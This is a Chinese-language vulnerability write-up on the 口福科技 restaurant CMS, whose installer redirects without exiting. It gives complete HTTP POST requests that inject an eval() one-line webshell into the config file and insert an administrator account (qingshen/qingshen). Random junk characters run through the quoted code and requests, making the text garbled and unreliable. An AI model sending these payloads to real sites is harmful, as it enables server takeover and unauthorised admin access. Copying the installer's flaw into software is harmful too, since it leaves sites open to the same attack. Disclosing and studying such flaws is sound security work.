口福科技餐厅cms漏洞(可getshell)

admin

问题出在/install/index.php文件。在程序安装完后，会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
6 @# I& W8 {# F. o7 ~5 c1 s
<?php
if(file_exists("../install.lock"))
4 x. {  j$ |; O# |4 r+ J; `) }{
    header("Location: ../");//没有退出
# B! Y1 N7 m9 Q; P8 o}
               
/ o/ z/ P: D" Y' O6 o: b  N//echo 'tst';exit;
require_once("init.php");
! s. q0 W2 L" Lif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
可见在/install/index.php存在时，只是header做了302重定向并没有退出，也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
# [5 L, j0 Z" J
1、getshell（很危险）
7 _2 P; o0 u) r8 pif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
! m- r& V  a7 d4 j, O' b{
8 }7 Q8 G2 d) P$smarty->assign("step",1);
$ z. X2 s6 w2 p0 @3 z) [9 S; N$smarty->display("index.html");
}elseif($_REQUEST['step']==2)
2 m4 {4 z; A* Z{
8 j( x' |9 \4 o* o    $mysql_host=trim($_POST['mysql_host']);
: H: a7 o  S# e' A- H' \1 ^) p" w    $mysql_user=trim($_POST['mysql_user']);
! U9 A! E" W& b* M- v/ l( @, x    $mysql_pwd=trim($_POST['mysql_pwd']);
' f0 m* m' m. p- _3 }6 ^( l$ }3 D    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);
    $str="<?php \r\n";
$ ^& p) y% Z' u+ F9 l& q7 c' @4 _3 Q    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
8 x  s$ R) \! Z# ^    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
& c$ e' z% ~: j' \7 U9 \) B% t上面的代码将POST的数据直接写入了../config/config.inc.php文件，那么我们提交如下POST包，即可获得一句话木马
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
$ A4 Z3 P! Y  `. b2 c* f% sHost: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
" F7 Z/ h8 S6 k2 GReferer: http://192.168.80.129/canting/install/index.php?step=1
  S8 ^2 Z& ?3 ^: n" gCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
! i, @& _' i* J/ S. EContent-Type: application/x-www-form-urlencoded
! p) J5 f9 @% f/ m$ F% `" E# fContent-Length: 126
         
7 p- S5 x- |! d9 ~- s) v! Omysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
但是这个方法很危险，将导致网站无法运行。

0 e3 C0 r3 C6 k8 M" X8 f, E: S2、直接添加管理员
! p2 ?4 }* f7 S9 Z
elseif($_REQUEST['step']==5)
{
/ {% L  p' a$ `' Y8 ]3 f    if($_POST)
    {   require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
! D& p6 K2 P# w; U9 }- w% t        mysql_select_db(MYSQL_DB,$link);
4 D# q9 e' G' B0 s/ P& d        mysql_query("SET NAMES ".MYSQL_CHARSET );
         mysql_query("SET sql_mode=''");
: n. \3 h9 I& L% @0 ?5 l" V
" N. Z  U3 K- ^1 o $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
7 }! [3 z5 x  _! l$ e        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
7 i2 [: S' y9 w! X        {
4 T) t  v0 c1 z& [" E
8 L3 U7 A) j$ B echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
' n( e* i% g8 L# e        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
. W- k. {- c2 X& m/ O2 ^9 y9 r        }
5 `; q1 v) m" K  I' ^- R! p        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
    }
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号，语句如下：
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
5 O! C# |7 F7 Y3 B) G' n; i. BHost: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
) B) {5 i( U$ S# jContent-Type: application/x-www-form-urlencoded
( N# |0 e) R2 j/ c" u! z6 r+ mContent-Length: 46
; K- O! J! l+ [5 O      
adminname=qingshen&pwd1=qingshen&pwd2=qingshen​